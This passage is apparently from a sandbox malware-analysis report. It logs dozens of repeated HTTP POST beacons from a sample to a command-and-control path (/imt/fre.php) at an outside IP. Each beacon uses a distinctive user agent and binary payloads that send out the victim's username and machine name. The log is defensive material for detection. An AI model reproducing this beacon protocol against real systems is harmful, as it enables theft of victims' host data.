                  Connection: close
                  Nov 25, 2021 18:23:40.326971054 CET8012OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:40.387691975 CET8012INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:40 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  35192.168.2.349829194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:41.914761066 CET8020OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:42.157748938 CET8020OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:42.233618021 CET8020INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:41 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  36192.168.2.349833194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:44.612993956 CET8044OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:44.640516996 CET8045OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:44.707284927 CET8045INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:44 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  37192.168.2.349845194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:45.744734049 CET8057OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:45.772535086 CET8058OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:45.839463949 CET8059INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  38192.168.2.349851194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:46.879978895 CET8072OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:46.908288956 CET8072OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:47.403832912 CET8077INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:46 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  39192.168.2.349855194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:48.864530087 CET8081OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:48.892277002 CET8081OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:48.959682941 CET8081INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:48 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.349748194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:25.292669058 CET1086OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:25.557539940 CET1086OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:25.843662024 CET1086INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:25 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  40192.168.2.349856194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:51.197910070 CET8082OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:51.225828886 CET8082OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:53.573219061 CET8083INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:51 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  41192.168.2.349857194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:55.025971889 CET8083OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:55.053550005 CET8084OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:55.525480032 CET8084INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:55 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  42192.168.2.349858194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:56.479058027 CET8085OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:56.507009983 CET8086OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:57.486293077 CET8086INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:56 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  43192.168.2.349859194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:59.056904078 CET8087OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:59.085151911 CET8087OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:59.210263968 CET8088INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:59 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  44192.168.2.349860194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:00.760570049 CET8088OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:00.788455963 CET8089OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:00.858030081 CET8089INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:00 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  45192.168.2.349861194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:02.488225937 CET8090OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:02.517215967 CET8090OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:02.585421085 CET8090INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:02 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  46192.168.2.349862194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:04.158303976 CET8091OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:04.185791016 CET8091OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:04.667956114 CET8091INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:04 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  47192.168.2.349863194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:06.231426001 CET8092OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:06.259443998 CET8093OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:06.343086958 CET8094INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:06 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  48192.168.2.349865194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:07.945362091 CET8100OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:07.980170012 CET8100OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:08.055053949 CET8101INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:07 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  49192.168.2.349866194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:09.150415897 CET8102OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:09.178721905 CET8102OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:09.249567986 CET8102INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  5192.168.2.349749194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:26.868772030 CET1087OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:26.902323961 CET1087OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:26.965337992 CET1088INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:26 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  50192.168.2.349867194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:24:11.256726027 CET8103OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:11.284368038 CET8104OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:24:11.963359118 CET8104INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:11 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  6192.168.2.349750194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:28.257549047 CET1088OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:28.287763119 CET1089OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:28.383367062 CET1089INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:28 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
